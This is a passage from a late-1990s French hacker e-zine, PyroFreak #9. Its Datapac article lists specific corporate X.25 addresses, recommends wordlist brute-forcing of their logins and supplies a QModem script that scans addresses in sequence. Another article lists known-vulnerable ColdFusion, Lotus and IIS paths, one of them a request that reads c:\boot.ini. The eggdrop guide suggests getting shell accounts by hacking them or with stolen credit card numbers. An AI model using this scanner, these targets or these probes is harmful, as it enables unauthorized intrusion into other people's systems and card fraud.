la liste de distribution (6)N-Changer votre nom dans le répertoire (7)P-Changer votre mot de passe (8)T-Tutorial complet pour configurer votre box (9)X-Sortir vers le menu principal (9)X-Sortir du systeme *=Probleme de traduction, référer vous au menu anglais --------------------------------------------------------------------------- Pour conclure, je n'ai pas encore trouvé beaucoup de box de ce type, mais bon, elle va surement devenir populaire, vu que son niveau de sécurité est assez élevé. J'ai trouvé un genre de Outdial dans la box, mais celui-ci est très spécial, parce que c'est un OutDial Fax. Donc, vous pouvez reçevoir des fax partout en Amérique Du Nord gratuitement, et cela à votre domicile ou à votre travail. Celui ci est spécial, car je crois que le fax est envoyé sur le systeme, et ensuite retransmi au numéro de fax inscrit dans le systeme , cela un peu plutard. Biensur l'Outdial fax est une option, donc, il n'est pas activé sur toute les boxs de ce type. Si je trouve d'autres informations intéressantes sur ce type de VMB, je vais vous les communiqués dans le #10 de PyroFreak. Conseil: Attention pour pas vous faire buster avec les outdials!!!! Salut ____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #9 |3-Return of Datapac |( ) Phreak (X) Hack ( ) Autres '.__________Par LeMarquis ________ ______ __lemarquiz@yahoo.com ___ Le net me fait chier. Il m'a grandement déçu dernièrement. J'avais une idée fausse de ce qu'il représentait. Au fur et à mesure que je compre- nais sa structure, et que je visitais certains de ces gros serveurs, mon illusion utopique prenait le bord. J'avais le rêve, de pouvoir accéder à de l'information que je qualifie de préviligiées. Une information qui me serait accessible après des efforts et de la persévérance. Ce que je me suis rendu compte c'est que cette information est absente du net. Les compagnies et organismes gouvernements ne s'en servent que comme façade à leur activité, comme publicité. Il possède quelques serveurs web et unix, qui n'ont aucune information non-publique. La seule information que l'on peut dorénavant accéder est celle des nouveaux serveurs commercial qui inondent le réseau. Mon article sur le réseau du Sirev dans le #7 permet de cerner les infor- mations confidentiels que l'on peut accéder. Il en reste cependant que des serveurs comme ceux-ci sont assez rare et que l'information qui s'y trouve est relativement intéressante. La peur alimentée par les médias de masse sur l'insécurité du net ne fait que rendre notre tâche plus ardue. Mais comment les secteurs commercial et gouvernements font-il leurs transfert de donné ? Il utilise parfois des dial-in. Un employer peut appe- ler directement au serveur de sa compagnie. Mais, si un employer doit faire des transferts de donner par un autre pays, le coût de liaison téléphonique sera considérable. C'est pourquoi plusieurs grandes compagnie de téléphonie ont établi leur propre réseau reliant plusieurs serveurs et d'autre réseau d'autre compagnie. Un employer qui est en Australie peut entrer dans le réseau international directement par un appel local en Australie et ensuite être connecter sur sa compagnie. Chaque serveur a une adresse déterminée appeler NUA qui est semblable a l'adressage IP d'internet. Le réseau le plus utiliser au Canada est le Datapac. Son insécurité est légendaire. Dans la fin des années 80's, les australiens se faisait un plaisir de scanner notre réseau. Avons nous trouver enfin un paradis pour tout hacker, un endroit ou se dépasser en toute liberté, ou explorer des réseau internes internatio- nales sans coût d'accès ? C'est ainsi que voyait les premiers hacker. A cette époque, le réseau était largement insécure et avait des systèmes très vulnérables. On pouvait trouver facilement des NUA ou se trouvait des modems pour faire des appels a l'extérieur du réseau (outdial). Mais est-ce que le réseau est toujours aussi paradisiaque ? Il est clair que le niveau de sécurité a été légèrement augmenter depuis une dizaine d'année. Cependant avec l'arriver d'internet, toute l'attention c'est porter sur celui-ci. On a quelque peu délaissé le vieux X.29 protocole. Ce qui fait que certaine compagnie on des serveur sur datapac qui sont outdated et peu utiliser. Un grand avantage des datapac c'est sont coût d'accès. Contrairement a internet , le réseau est totalement gratuit. Le coût de vos connexion sur le réseau sera payer par l'ensemble des propriétaire de NUA par un calling collect charge. Il ne s'agit que de téléphoner sur le dial-in Datapac le plus près de chez vous (voir dans le bottin téléphonique pour DATAPAC). Aussi vu que des centaines d'appel sont loger sur les dial-in chaque jours, le retracage d'un intrusion est très difficile. Les mécanisme pour identifier la source d'une connexion sur une NUA sont peu efficace. --------------------- Connexion au serveur -------------------- Accès datapac : Montreal : 514-875-9470 Québec : 418-647-2421 Autres Area : regarder dans votre bottin Paramètre de communication: -local echo (parfois pratique) -8N1 (Data=8, Parity=NONE, 1 stop bit) -Terminal VT-100 Un fois toute la configuration de votre dialer terminer et votre terminal connecter, taper ".." DATAPAC: 8270 1XXX : apparait lors Vous êtes enfin connecter sur le système. Le plaisir commence, l'exploration débute. Il suffit de taper une adresse NUA pour ce faire connecter sur celle-ci. Composition d'une NUA (1)(3020)(1230)(0001)(01) | | | | | | | | | | Prefix International | | | | | | | | | | | Datapac DNIC | | | | | | Prefix d'Adresse | | | | Adresse du système | | LCN Subadresse (si nécessaire) Le (1) ou (0) ne sont souvent pas nécessaire. Liste de Nua Intéressants: 92100086 : Datapac Info Service 44500469 : Novopharm PIP File Server Major BBS 43600107 : Canada Life Assurance Co. [Sim] 43700085 : HP980.TOR.BASF [Sun] 51100201 : Raffinerie de Montreal SCO System V/386 56300430 : AIX Version 4 83501097 : Password > Ces adresses ont été vérifié par moi dernièrement. J'ai tester manuel- lement chaque des NUA présente dans une liste datant de plusieurs années disponible dans mes références. Bien-sur certain serveur demande des pass- words, ce n'est que pour vous donner une idée de type de serveur qui s'y trouve. Une bonne technique d'attaque serait de scanner a l'aide d'un script une série de NUA en incriminent le chiffre. Vue qu'il existe encore des serveurs sans password ( oui voit avez bien, serveur sans aucune sécurité ), vous les trouverez facilement avec une scan. Pour les serveur plus robuste que celui des Raffinerie ci-dessus, une attack du login et du password par des wordlist pourrait être efficace. Liste des Prefix International (DNIC) Pays Reseaux DNIC Australia Midas 5053 8elgium Euronet 2062 Belgium Euronet 2063 Canada Datapac 3020 Canada Globedat 3025 Canada Infoswitch 3029 Denmark Euronet 2383 France Transpac 2080 French Antilles Euronet 3400 Germany (FDR) Datex P 2624 Germany (FDR) Euronet 2623 Hong Kong IDAS 4542 Irish Republic Euronet 2723 Italy Euronet 2223 Japan DDX-P 4401 Japan Venus-P 4408 Luxembourg Euronet 2703 Netherlands Euronet 2043 Country Network DNIC Norway Norpak 2422 Portugal N/A 2682 Singapore Telepac 5252 South Africa Saponet 6550 Spain TIDA 2141 Sweden Telepak 2405 Switzerland Datalink 2289 Switzerland Euronet 2283 U.S.A. Autonet 3126 U.S.A. Compuserve 3132 U.S.A. ITT (UDTS) 3103 U.S.A. RCA (LSDS) 3113 U.S.A. Telenet 3110 U.S.A. Tymnet 3106 U.S.A. Uninet 3125 U.S.A. WUI (DBS) 3104 Zone des prefix d'adresse dans les Datapac Prefix Zone 200 - 399 ONTARIO 400 - 429 QUEBEC 430 - 449 ONTARIO 450 - 579 QUEBEC 580 - 584 NWT/YUKON 585 - 639 ALBERTA 640 - 689 BC 690 - 709 MANITOBA 710 - 739 SASKATCHEWAN 740 - 759 NEW BRUNSWICK 760 - 779 NOVA SCOTIA 780 - 799 NEWFOUNDLAND 800 - 819 ONTARIO 820 - 829 QUEBEC 830 - 839 BC 840 - 849 ALBERTA 850 - 929 ONTARIO 930 - 939 MANITOBA 940 - 949 ALBERTA 950 - 999 ONTARIO Erreur de connexion fréquente sur une NUA: ADDRESS NOT IN SERVICE: l'adresse mentionner ne correspond pas présentement a un système BUSY: le système n'accepte plus de demande de connexion INCOMPATIBLE CALL OPTIONS: l'adresse mentionner n'est pas possible DESTINATION NOT RESPONDING: le système ignore ton appel ACCESS BARRED: le système n'accepte pas la connexion avec ton adresse COLLECT CALL REFUSED: le système n'accepte pas les frais de connexion Le script dans son fichier d'origine: datapac2.qsc dans le .zip du zine Ce script fonctionne avec Qmodem. Celui-ci est disponible sur www.download.com Ce script est un programme pour le scannage de NUA --------- Script de Scan ------------- dim nua as integer,i as integer,z as integer,area as integer dim inter as string declare sub scan // Begin send ".." waitfor "Datapac" print "Start Scanning at "; time i=0 z=0 inter="" area=512 nua=51200000 capture on call scan sub scan do while i <= 10000000 // Maximum de Nua if inkey = "F12" then print "Up to "+str(nua) print "At ";time area=area+1 nua=area*100000 end if print inter+str(nua) send inter+str(nua) + "^M" waitfor "Datapac: call cleared",10 // Timeout i=i+1 nua=nua+1 loop print "Scanning ended at "; time print str(i) + " NUA scanned" end end sub catch err_timeout z=z+1 print "Timeout "+str(z)+" on " + str(nua) send "^pclr^M" if z=10 then print "10 Timeout at: "+str(nua) print "At ";time end end if waitfor "Datapac:",20 z=0 nua=nua+1 i=i+1 call scan end ------------- End ---------------- ____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #9 |4-Comment Installer Un EggDrop Sur Un Shell Account |( ) Phreak ( ) Hack (X) Autres '.__________Par Oculair ________ ______ oculair@pyrofreak.org __ ___ Introduction: Salut la gang, pour ceux qui me connaise pas je m'appelle Oculair et ca fait déja quelques mois que je fréquente régulièrement le canal #pyrofreak . Bon dans cette article je vais vous parlez le plus précisément possible comment installer un eggdrop sur un shell account, un shell account c'est un account sur base linux/unix/freebsd/netbsd/openbsd acec laquelle on peut , selon notre access exécuter des programmes qui nécessite une connection internet permanente et un des systèmes d'exploitations que jai nommé ci-haut. Depuis quelques temps les shell account sont plus utilisée afin de runner un eggdrop , un serveur shoutcast , un bouncer ou un ircd , mais ce n'est seulement que quelques exemples car la des application est très grande. Moi je vais vous parler en particulier du eggdrop, donc pour aujourd'hui on peut oublier le serveur IRC, shoutcast et le bounser, ça sera peut-etre pour un autre jour. Cet article n'est pas Underground mais je sais que plusieurs personnes s'interesse aux eggdrop et ignores comment en installer un, donc cet article est pour eux. Pré requis: - Un shell account - Les fichiers du programme Eggdrop (Voir site de PyroFreak.org) - Un QI d'au moins 20 - Un peu de patience - Un programme client Telnet(menu démarrer, exécuter, tappez: telnet ) - Un programme client FTP (CuteFTP) - Un programme client IRC (mIRC) - Une caisse de 12 - Un bon join - Un serveur et un canal IRC pour acceuillir votre bot Bon c'est a peu près ca :) Le shell account coute généralement de l'argent, à moins que vous en hackiez un ou bien que vous vous en achetez un avec des numéros de carte de crédit. Voir PyroFreak mag #6 Ps: Dans les étapes d'installations les commandes que vous devrez faire seront placé entre " " , vous devrez donc la faire dans les " " bien sur Première étape: Pour commencer vous devez avoir l'adresse permettant de vous connecter en telnet sur votre shell account, pour cet article supposont que notre adresse telnet est telnet.pyrofreak.org vous avez aussi besoin de l'adresse ftp pour vous connecter via ftp sur votre shell account afin d'uploader les fichiers eggdrop, donc pour cet article supposont que l'adresse est ftp.pyrofreak.org . Une fois que vous avez ces adresses ouvrez votre programme ftp et connectez-vous à votre account en utilisant votre login et passworld que vous avez choisi lors de votre inscription à votre shell account. Une fois connecté, uploadez le fichier eggdrop1.3.28.tar.gz (disponible dans la section programmes du site de PyroFreak) . Quand c'est fait allez à la deuxième étape. Deuxième étape: Jusqu'à la ce n'est pas trop compliqué, dumoins je l'espère pour vous. Quand vous avez fini d'uploader le fichier sur votre shell account vous vous ouvrez une bonne bière puis vous allez à la troisième étape. Troisième étape: Une fois que votre bière est ouverte, Vous ouvrez votre programme telnet et vous vous connectez au serveur telnet de votre shell ( telnet.pyrofreak.org ) et une fois connecté vous faites la commande "dir" et assurez-vous que le fichier eggdrop1.3.28.tar.gz est bien dans ce repertoire. Si ce n'est pas le cas recommencez la première étape afin d'uploader le fichier eggdrop1.3.28.tar.gz dans le bon repertoire. Une fois que vous voyez le fichier quand vous tappez la commande "dir" vous êtes prêt(e) pour commencer l'installation. Quatrième étape: Nous entrons dans la partie plus technique de l'installation du bot donc, ouvrez-vous une autre bière, et toujours en telnet et dans le répertoire où est placé le fichier eggdrop1.3.28.tar.gz vous tappez la commande "tar xfvz eggdrop1.3.28.tar.gz" et vous attendez quelques secondes afin que le décompressagement du fichier se termine. Quand c'est fait vous faites "cd eggdrop1.3.28" pour entrer dans le réper- toire du eggdrop en question. Une fois à l'intérieur vous tapez "./configure" (le . est important) pour verifier si le système est compatible avec le eggdrop et pour configurer les paramètres par défaut. Ensuite tapez "make" pour construire le eggdrop, cela vas créer les repertoires et faire les fichiers exécutables. Quand tout cela est terminé il reste qu'une petite étape à faire avant d'entrer dans la configuration. Cette étape consiste à créer un repertoire où serons situés les modules, les modules c'est les fichiers où sont situé toutes les commandes du eggdrop, on peut aussi dire que ce sont les fichier sources secondaires du eggdrop. Bon pour créer le répertoires, toujours à l'intérieur du repertoire eggdrop1.3.28 vous faites "mkdir modules" et ensuite vous faites "mv *.so modules/" afin de transférer les fichiers modules (.so) vers le repertoire des modules (modules/). Cinquième étape: L'installation est désormais terminée, nous voici actuellement rendu au stade de configuration du eggdrop, comme vous êtes très chanceux je vous ai déja tout fait un fichier de configuration qui n'attend seulement que vous l'uploadez dans le repertoire de votre eggdrop, le contenu de ce fichier est disponible dans le bas de cet article. Donc vous copiez tout à partir de la première ligne jusqu'à la toute dernière dans un fichier que vous avez préallablement créé au nom de eggdrop.conf . Quand vous avez copié le fichier vous l'ouvrez et vous verifiez la partie: Section Générale pour vous assurer que tout est à votre goût. Une fois que c'est copié et verifié vous uploadez votre fichier via FTP dans le repertoire eggdrop1.3.28 de votre shell account. Une fois que le fichier est présent dans ce repertoire, verifiez sa présence à l'aide de telnet dans le repertoire egg- drop1.3.28 en tappant "dir" et verifiez que eggdrop.conf soit réel- lement dans ce répertoire. Ensuite rendez-vous, toujours en telnet, dans le repertoire eggdrop1.3.28 et tappez la commande "./eggdrop -m eggdrop.conf" pour démarrer le bot. Sixième étape: Une fois que le bot est démarré il devrait se rendre automatiquement sur le serveur et le canal que vous avez préallablement inscrit dans le eggdrop.conf , et une fois qu'il est arrivé sur le canal vous tap- pez, cette fois à l'aide d'un client IRC (mIRC ou autres), la com- mande:"/msg NICK_DU_BOT hello" (Évidamment vous changer le NICK_DU_ BOT pat le nick de votre bot), À ce moment, le bot devrais vous ré- pondre en vous disant qu'il vous a reconnu et que vous êtes mainte- nant owner de ce bot. Si tel n'est pas le cas revérifiez votre fi- chier eggdrop.conf . Et si il vous a répondu comme prévus vous devez maintenant enregistrer votre mot de passe à l'aide de la commande "/msg NICK_DU_BOT pass VOTRE_PASS" (Cette fois vous changez le NICK _DU_BOT par le nick de votre bot et le VOTRE_PASS par le mot de passe que vous désirez. Maintenant faîtes un DCC CHAT sur votre bot, et il vous demmanderas alors d'inscrire votre mot de passe. Une fois que c'est fait, faites la commande suivante dans le DCC CHAT ".die restart" et ensuite allez dans le telnet pour repartir le bot en enlevant le -m donc avec la commande suivante "./eggdrop eggdrop.conf" Quand c'est fait le bot devrais se rendre à nouveau sur le canal et vous pourrez le DCC CHAT immédiatement comme il a sauvegardé le mot de passe que vous avec préallablement choisis. Une fois dans le DCC CHAT vous pouvez consulter l'aide en tappant la commande ".help" pour ajouter un canal vous faites ".+chan #canal" pour enlever un canal la commande est ".-chan #canal" et pour adder un user faites ".help +user" ou ".help adduser" pour en supprimer ".help -user" et pour établir un niveau d'access à chaque user vous tappez ".help chattr" Septième étape: Et voilà, tout es fait, donc fumez votre join et buvez le reste de votre 12 :) pour de l'aide plus appronfondie veillez me MSG sur IRC ou bien m'écrire un E-Mail à oculair@pyrofreak.org Le fichier de configuration: #!!!! DÉBUT DU FICHIER DE CONFIGURATION !!!!# # _____ _____ _ ______ ______ __ ___ _________ # |: __ _ \ \ \ / / | ____ | / ___ | # | \__ _\ \ \ \/ ; / |; /_ _/ | / / /; | # | ____ __ ___\ \ : / |: _ / | / / : | # |: | / , / |, | \ : \ | :\__/ | # |; | ___/ . / |. | \ ; \ | ; / # |___\ \________/ |___\ \__ ____\ |_________/ # ____ _ ___ __ ___ ___ ______ __ _______ # |: _ _ ;\ | \ \ \ / ;| | | / . / # | | \_______\ |: _\ \_ _\ / /| :| | ;| / / # _| |___ _____ |; |__ ____ / <_| ,| | |/ : / # |_|, ___| |; .\ | __\ \_:__\ / _ | | ;/ # |: | |: ` / | :|____ ____ \ / |; | | |\ \ # |; | |, |\ \ | ; \ \ ;\ \/ |: | |: | \ .\ # |___\ |__| \_| |________\ \____\ |____| |___\ \_____\ # OpEn YoUr EyEs # # Crédit: __2 # ## NE PAS MODIFIER ## loadmodule channel loadmodule server loadmodule ctcp loadmodule irc loadmodule transfer loadmodule console loadmodule seen ## FIN ## # ######## Ce .conf est offert par Oculair pour le groupe PyRoFrEaK ######## ##### Section Générale ##### # le username de votre bot, *!*XXXX@*.pyrofreak.org (Le username est la # section XXXX) # Ps: Cela peut ne pas changer la section XXXX cela depend de la compagnie # de shell set username "pyrofreak" # Nickname du bot set nick "PyRoFrEaK" # Nickname du bot si le principal est déja utilisé set altnick "PyRoBoT" # Nom du bot ( /whois ) set realname "PyroFreak Crew Bot" # Nom de l'administrateur de ce bot set admin "Oculair " # Nom du serveur IRC où le bot sera connecté set network "undernet.org" # L'heure utilisé par le bot sera set timezone "EST" # Fichier log des canal dont vous voulez garder le log des dernier 48 heures logfile jk #pyrofreak "pyrofreakch.log" # Liste des serveurs du bot set servers { ann-arbor.mi.us.undernet.org:6667 atlanta.ga.us.undernet.org:6667 services1.undernet.org:6667 mclean.va.us.undernet.org:6667 NewBrunswick.NJ.US.Undernet.Org:6667 } # Si vous avez des Vhost seulement enlever les # # devant les 2 comandes qui suivent # et modifiez la selon le vhost que vous désirez #set my-hostname "virtual.host.com" #set my-ip "99.99.0.0" # Nickname du owner de ce bot set owner "Oculair" # Canal par défaut du bot channel add #pyrofreak # Configuration par defaut lorsque vous addé un canal ( .+chan ) # XX:XX (nombre de fois:secondes) set global-flood-chan 20:10 set global-flood-deop 10:10 set global-flood-kick 6:10 set global-flood-join 5:60 set global-flood-ctcp 3:30 set global-chanset { -clearbans +enforcebans +dynamicbans +userbans -autoop -bitch +greet -protectops +statuslog -stopnethack -revenge -secret +autovoice -cycle -dontkickops -wasoptest -inactive +protectfriends +shared -seen +userexempts +dynamicexempts +userinvites +dynamicinvites } set global-chanmode "nt" ##### Scripts ##### # Loadez ici vos scripts (TCL) si vous en avez # la commande pour le faire est: source scripts/nomdutcl.tcl # naturellement vous devez uploader les tcl dans le repertoire # scripts de votre bot ##### Section Avancée, modifiez à vos risques ##### # Firewall Setup: #set firewall "proxy:178" #set firewall "!sun-barr.ebay:3666" #set nat-ip "127.0.0.1" #set reserved-port 9076 # Ports Telnet: #listen 3333 bots #listen 4444 users listen 9222 all ##### Autres: configuration par défaut ##### set protect-telnet 0 set dcc-sanitycheck 0 set ident-timeout 5 set require-p 0 set open-telnets 0 set stealth-telnets 0 set use-telnet-banner 0 set connect-timeout 15 set dcc-flood-thr 10 set telnet-flood 3:60 set paranoid-telnet-flood 0 set resolve-timeout 15 set ignore-time 15 set debug-output 0 set hourly-updates 00 set notify-newusers "$owner" set default-flags "hp" set whois-fields "url birthday" set remote-boots 2 set share-unlinks 1 set die-on-sighup 0 set die-on-sigterm 0 #unbind dcc n tcl *dcc:tcl #unbind dcc n set *dcc:set #unbind dcc n simul *dcc:simul set must-be-owner 1 set max-dcc 50 set dcc-portrange 1024:65535 set enable-simul 1 set allow-dk-cmds 1 set max-logs 5 set max-logsize 0 set quick-logs 0 logfile mco * "eggdrop.log" set log-time 1 set keep-all-logs 0 set switch-logfiles-at 300 set console "mkcobxs" set userfile "UserFile.bot" set sort-users 0 set help-path "help/" set temp-path "/tmp" set motd "motd" set telnet-banner "telnet-banner" set mod-path "modules/" set chanfile "ChanFile.bot" set ban-time 600 set exempt-time 15 set invite-time 15 set share-greet 0 set use-info 1 set net-type 2 set init-server { putserv "MODE $botnick +i-ws" } set keep-nick 1 set use-ison 1 set strict-host 0 set quiet-reject 1 set lowercase-ctcp 0 set answer-ctcp 3 set flood-msg 10:60 set flood-ctcp 3:60 set never-give-up 1 set strict-servernames 0 set default-port 6667 set server-cycle-wait 60 set server-timeout 15 set servlimit 0 set check-stoned 1 set use-console-r 0 set serverror-quit 1 set max-queue-msg 300 set trigger-on-ignore 0 set double-mode 0 set double-server 0 set double-help 0 set ctcp-mode 0 set bounce-bans 1 set bounce-modes 0 set kick-bogus-bans 1 set bounce-bogus-bans 1 set max-bans 30 set max-modes 30 set allow-desync 0 set kick-bogus 0 set ban-bogus 0 set kick-fun 0 set ban-fun 0 set learn-users 0 set wait-split 300 set wait-info 60 set mode-buf-length 200 #unbind msg - ident *msg:ident #unbind msg - addhost *msg:addhost set no-chanrec-info 0 set bounce-exempts 0 set bounce-invites 0 set max-exempts 20 set max-invites 20 set bounce-bogus-exempts 0 set kick-bogus-exempts 0 set bounce-bogus-invites 0 set kick-bogus-invites 0 set max-dloads 2 set dcc-block 0 set copy-to-tmp 1 set xfer-timeout 30 set notefile "NotesFile.bot" set max-notes 50 set note-life 60 set allow-fwd 0 set notify-users 1 set notify-onjoin 1 set console-autosave 1 set force-channel 0 set info-party 0 checkmodule blowfish source scripts/alltools.tcl source scripts/action.fix.tcl source scripts/userinfo1.0.tcl loadhelp userinfo.help #!!!! FIN DU FICHIER DE CONFIGURATION !!!!# ____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #9 |5-comment killer ces fuckin' popup |( ) Phreak ( ) Hack (X) Autres '.__________Par mXg ________ _______________ mxg@cyberdude.com __ ___ NB Importante: Les *\(ce qui a ici doit etre sur la meme ligne )/* Raison: Pour une question de mise en page du magazine Multimania.com, Tripod.fr ou encore Chez.com ont ce point commun qu'est la pop-up de pub. Comment leur rabattre leur caquet ( ou encore, comment killer ces fuckin' popup :-D ) ? Matos : * Une machine sous Windows * Un compte chez un de ces hébergeurs gratuits * de la patience * Et un éditeur tout bête, genre le NotePad Vous vous demandez peut etre la raison d'autant de générosité de la part de société comme Multimania ou Tripod ? En effet, ceux ci vous propose, gratos, 10 à 20 Mo d'espace disque pour narrer votre vie trépidente à Trouloulou-les- deux-Eglises en compagnie de votre chien et de vos vaches asthmatiques .... Gratos, avez vous dit ?Euh, hum ...pô vraiment, en fait...Il faut juste accepter à chaque chargement de page, l'apparition d'une pop-up ( vous savez ces petites fenetres de 400px sur 50 environ ) assez énervante où l'on vous vante les mérites de votre hébergeur pour les uns ou les mille et une facon de faire joujou avec vos deniers ou votre libido pour les autres.... Passons ...Cette pop-up n'apparait pas par magie, POUF !!!, comme ca... Elle est générée par quelques lignes de JavaScript automatiquement ( et perfidement ) inséré à vos pages lors de l'upload de celle ci sur le serveur distant..... oui, oui, je m'explique : Lorsque vous voulez mettre à jour votre page sur les derniers traitements de lutte contre l'asthme bovin ( voir plus haut), vous vous connectez via FTP ( AH NON !ne me demandez pas ce que c'est ...Voyez le dico de Taz ), vous téléchargez ( download ) la page sur votre disque dur, vous faîtes vos modifs. puis vous la renvoyez ( upload ) sur le serveur distant ...Et c'est à ce moment LA que le serveur va rajouter le JavaScript générateur de pop-up !!! Bref, pour contrer ce genre de désagrément, il faut rajouter à vos pages une routine JavaScript qui oblige la pop-up à ce fermer toute seule...en d'autre terme : à ce suicider (TADA !!!! ) C'est en étudiant le problème par une morne journée de boulot que je me suis rendu compte que la meilleur façon de pousser au suicide ces popups était de détourner les scripts qui les avaient générées. ( ouah ... C'est fort, ca ;-D) C'est pour cette raison que vous retrouverez les memes noms de variables ainsi que la meme structure autant de la procédure de suicide que dans celle de naissance de ce fléau du Net ( et je n'exagère pas ) . C'est aussi pour cette raison que le "script-tueur" est différent pour chaque hébergeur. Procédure : Tout d'abord, creer une page toute bête nommée "blaxx.htm". Dans celle ci, entre les balises et : Et c'est tout pour cette page. Ah oui, une chose : faîtes gaffe à la casse en JavaScript Pour vos pages persos. : Il faut maintenant inserer le "script-tueur" : Pour Multimania, placer le script suivant juste après la balise Vous verrez peut etre apparaitre pendant une seconde la fenetre de pub, mais celle ci se refermera automatiquement. Pour Tripod, meme procédure pour "blaxx.htm" ....Puis inserer le script suivant juste après la balise : function TripodShowPopup() { // open the popup window var popupURL = "blaxx.htm"; */(var popup = window.open(popupURL,"TripodPopup",'toolbar=0,location=0, directories=0,status=0,menubar=0,scrollbars=0,resizable=0,width=470, height=110');)\* // set the opener if it's not already set. it's set automatically // in netscape 3.0+ and ie 3.0+. if( navigator.appName.substring(0,8) == "Netscape" ) { popup.location = popupURL; } } TripodShowPopup(); Enfin , pour chez.com, la procédure est toujours la meme en ce qui concerne "blaxx.htm". Il faut placer ce script en bas de votre page APRES la balise suivante : Voila, c'est tout ..... Bien sur , s'il y a des problemes, faites le moi savoir à cette adresse : mxg@cyberdude.com mXg -- (c) 1999 ____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #9 |6-Scanner un reseau (Cold fusion, Lotus, etc...) |( ) Phreak (X) Hack ( ) Autres '.__________Par Robert ________ _____ ______ ______________ __ ___ Scanner un reseau: __________________ Cold fusion: ____________ www.server.com /cfdocs/zero.cfm /cfdocs/root.cfm /cfdocs/expressions.cfm /cfdocs/TOXIC.CFM /cfdocs/MOLE.CFM /cfdocs/expeval/exprcalc.cfm /cfdocs/expeval/sendmail.cfm /cfdocs/expeval/eval.cfm /cfdocs/expeval/openfile.cfm /cfdocs/expeval/displayopenedfile.cfm /cfdocs/exampleapp/publish/admin/addcontent.cfm /cfdocs/exampleapp/email/getfile.cfm?filename=c:\boot.ini /cfdocs/exampleapp/publish/admin/application.cfm /cfdocs/exampleapp/email/application.cfm /cfusion/cfapps/forums/forums_.mdb /cfusion/cfapps/security/realm_.mdb /cfusion/cfapps/forums/data/forums.mdb /cfusion/cfapps/security/data/realm.mdb /cfusion/database/cfexamples.mdb /cfusion/database/cfsnippets.mdb /cfusion/database/smpolicy.mdb /cfusion/database/cypress.mdb www.server.com /DataBase/ Lotus: (4.6) ______ /database.nsf/e1466a8590/6048076233?OpenDocument /database.nsf/e146fa8590/6148076233?EditDocument /database.nsf/e146fa8590/6148076233?DeleteDocument /database.nsf/viewname?SearchView&Query="*" " /domcfg.nsf/?open /domcfg.nsf/URLRedirect/?OpenForm. www.server.com/domcfg.nsf/ /domlog.nsf/ /log.nsf/ /catalog.nsf/ /names.nsf/ /database.nsf/ /today.nsf/ Omnihttpd _________ c:\httpd\cgi-bin cgi-lib.pl imagemap.c imagemap.exe minimal.exe redir.exe stats.prg statsconfig visadmin.exe visitor.exe cgi-win wincgi.bat htmldocs icons logs Windows nt __________ www.server.com/Scripts www.server.com/Default.asp www.server.com/_vti_bin www.server.com/_vti_bin/_vti_adm www.server.com/_vti_bin/_vti_aut www.server.com/cgi-bin/ www.server.com/srchadm www.server.com/iisadmin www.Server.com/_AuthChangeUrl? Front page 98 _____________ www.server.com/scripts/ cpshost.dll uploadn.asp uploadx.asp upload.asp repost.asp postinfo.asp run.exe Front page 98 + inetpub + nt4 server
local
c:\inetpub\ftproot \gophroot \scripts\iisadmin\ adv.htr advaddd.htr advadddu.htr advaddg.htr advaddgu.htr advded.htr advdeg.htr advdeny.htr advdeny2.htr advedd.htr adveddu.htr advedg.htr adevdgu.htr advgrant.htr advu.htr bdir.htr bdiru.htr conn.htr dir.htr diradd.htr diraddu.htr dirdel.htr dirdt.htr dirdtu.htr diru.htr dirv.htr disc.htr disca.htr log.htr logu.htr msg.htr msgu.htr serv.htr servu.htr \scripts\iisadmin\samples\ ctgestb.htx ctgestb.idc details.htx details.idc query.htx query.idc register.htx register.idc sample.htx sample.idc sample2.htx sample3.idc viewbook.htx viewbook.idc \scripts\iisadmin\tools\ ct.htx ctss.idc dsnform.exe getdrvrs.exe mkilog.exe newdsn.exe www.server.com/IISADMPWD. (IIS 4.0) achg.htr aexp.htr aexp2.htr aexp2b.htr aexp3.htr aexp4.htr aexp4b.htr anot.htr anot3.htr Server nt4 et webfolders c:\Web Root \_vti_bin shtml.dll \_vti_aut author.dll \_vti_adm admin.dll remote: www.server.com/_vti_bin/shtml.dll www.server.com/_vti_bin/_vti_aut/author.dll www.server.com/_vti_bin/_vti_adm/admin. ____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #9 |7-Critiques de Programmes |( ) Phreak ( ) Hack (X) Autres '.__________Par [-Dark-] __________ ______ webmaster@pyrofreak.org ___ Progs Testés (ou essayés) - WinDupe '98 RC 1.6b - G6 FTP Server (beta) - Genius 2.7 et 3(beta) <-- revu... Resalut tlm ! Revoici ma tite chronique mensuelle (tk... un par zine) Donc espérant que vous trouverez quelque chose qui pourrait vous être utiles... WinDupe '98 RC 1.6b (+- 285 Kb) ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ http://www.jaydee.cz/filfree.htm Je suis certain que ya plusieurs d'entre vous qui connaissez ca mais bon.... C'est qu'a chaque fois que j'en parle sur #pyrofreak yen a une mozus de gang qui sais pas de quoi je parle ;) Donc comme le dit un peu le non c'est un prog pour chercher des releases. PAS LES DOWNLOADER. Mais bien chercher quand ils sont sortis et leurs grosseurs, le nb de fichiers, le nfo et etc.. Donc très utiles aux suppliers (C'est pour ca que je l'ai ;) et pour cher- cher quelque chose de précis ou bien tout simplement pour avoir un # de série rapidement (dans le nfo). Donc vous pouvez faire sortir le nombre de rls que vous voulez et etc.... Pour avoir les dernières rls qui viennent de sortir vous tappez "-" dans les guillemets bien sur ;) Pours : - Très très très simple - Dispose de tout ce dont un bon supplier a besoin ;) je veux dire les options du prog la - etc etc etc Contres : (Faut ben qui en aille tsé :P ) - Le piton delete marche pas le X rouge la (bof on s'en calis mais bon) - On peux rien downloader viarge :PPPP même si je préfère les iso's G6 FTP Server (beta 5 et 6) (+- 1.08 Mo) ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ wwww.gene6.com La vous allez me dire : "encore un ostie de "/$)("/$ de programme pour faire un ftp !". Ben oui... mais celui la... je le trouve TRÈS COMPLET, SIMPLE, FACILE D'UTILISATION, Moins chiant à configurer que WARFTPD et plus jolie et plus complet que Serv-U. Donc si vous voulez des screen shots y'en a sur le site. ;) Le prog premièrement est très très bien faite.... ya toutes les calis d'options aussi utiles qu'inutiles ;) Il permet même de faire des raccouçi comme dans SERV-U... pis jpense que tu les fais de la même manières ... Le seul inconvéniant c'Est qui a quelqu'un qui a trouvé comment le faire planter avec un exploit mais bon.. Une nouvelle version s'en vient 